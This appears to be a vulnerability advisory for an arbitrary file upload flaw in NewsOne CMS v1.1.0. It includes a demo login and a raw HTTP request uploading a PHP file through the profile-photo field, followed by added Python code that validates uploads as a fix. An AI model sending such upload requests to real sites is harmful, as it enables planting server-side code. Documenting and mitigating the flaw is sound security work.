NewsOne CMS News, Magazine & Blog Script v1.1.0 Arbitrary File Upload
# Exploit Title: NewsOne CMS  News, Magazine & Blog Script v1.1.0 Arbitrary File Upload
# Google Dork: -
# Date: 18/01/2020
# Exploit Author: m0ze
# Vendor Homepage:
# Software Link:
# Version: 1.1.0
# Tested on: Kali Linux
# CVE: -
# CWE: 434

----[]- Info: -[]----
Demo website:
Demo account: member/member12345 (login/password)
PoC Upload #0:
PoC Upload #1:
PoC Upload #2:
PoC Upload #3:

----[]- Arbitrary File Upload -> User Profile: -[]----
Authenticate as a regular user (member/member12345, for example) and upload any file you want on the page via the <input type="file" name="user_image"> field.


POST /auth/edit HTTP/1.1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 501
Connection: close
Cookie: _your_cookies_here_
Upgrade-Insecure-Requests: 1

Content-Disposition: form-data; name="member_id"

Content-Disposition: form-data; name="user_image"; filename="phpinfo.php"
Content-Type: application/octet-stream

Content-Disposition: form-data; name="edit_user_photo"

Update Profile Photo
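
Added example, not part of the original advisory or the NewsOne code base: the server-side validation that CWE-434 calls for, applied to the `user_image` part of a request shaped like the one above. The allowlist, the boundary string, the `member_id` value, the file contents and the function names are assumptions constructed for illustration.

```python
import os
import secrets
from email.parser import BytesParser
from email.policy import HTTP

# Assumed policy: profile photos may only be these types (extension -> magic bytes).
ALLOWED = {".png": b"\x89PNG", ".gif": b"GIF8",
           ".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff"}
BOUNDARY = "constructed-boundary"  # constructed sample value, not from the advisory
CONTENT_TYPE = f"multipart/form-data; boundary={BOUNDARY}"


def check_user_image(content_type, body, field="user_image"):
    """Validate the file part named `field`; return (accepted, reason, stored_name)."""
    # Re-attach the Content-Type header so the stdlib MIME parser can split the parts.
    msg = BytesParser(policy=HTTP).parsebytes(
        b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body)
    for part in msg.iter_parts():
        if part.get_param("name", header="content-disposition") != field:
            continue
        # The client-supplied name is only read for its extension, never used as a path.
        client_name = os.path.basename(part.get_filename() or "")
        ext = os.path.splitext(client_name)[1].lower()
        data = part.get_payload(decode=True) or b""
        if ext not in ALLOWED:
            return False, f"extension {ext!r} is not an allowed image type", None
        if not data.startswith(ALLOWED[ext]):
            return False, "file content does not match its extension", None
        # Store under a server-generated name so the request cannot choose it.
        return True, "ok", secrets.token_hex(16) + ext
    return False, f"no {field!r} part in request", None


def sample_request(filename, data):
    """Constructed multipart body shaped like the request on this page."""
    sep = b"--" + BOUNDARY.encode()
    return b"\r\n".join([
        sep, b'Content-Disposition: form-data; name="member_id"', b"", b"1",
        sep, b'Content-Disposition: form-data; name="user_image"; filename="'
             + filename.encode() + b'"',
        b"Content-Type: application/octet-stream", b"", data,
        sep + b"--", b""])
```

Magic-byte checks do not stop files that are valid images and also contain script code, so the upload directory should additionally be served with script execution disabled.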
